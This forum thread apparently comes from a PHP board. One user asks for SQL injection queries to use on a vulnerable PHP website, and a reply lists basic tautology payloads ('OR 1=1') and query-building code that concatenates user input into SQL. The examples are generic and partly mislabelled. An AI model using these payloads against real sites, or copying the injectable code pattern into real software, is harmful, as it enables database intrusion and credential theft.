SQL Injections in PHP

General discussion on PHP

SQL Injections in PHP

Postby sand9364 on Tue May 16, 2017 6:07 pm

Can Anybody List out some SQL injections queries to inject in a Php website which is vulnerable.
sand9364
 
Posts: 1
Joined: Tue May 16, 2017 6:05 pm

Re: SQL Injections in PHP

Postby jess9156 on Fri Oct 20, 2017 8:05 am

here are some of the SQL injection queries that will be useful for you.

SQL Injection Based on 1=1 is Always True
SELECT * FROM Users WHERE UserId = 105 OR 1=1;
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;

SQL Injection Based on ""="" is Always True
uName = getRequestString("username");
uPass = getRequestString("userpassword");

sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'

SQL Injection Based on Batched SQL Statements
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
jess9156
 
Posts: 1
Joined: Fri Oct 20, 2017 7:56 am


Return to PHP

Who is online

Users browsing this forum: No registered users and 2 guests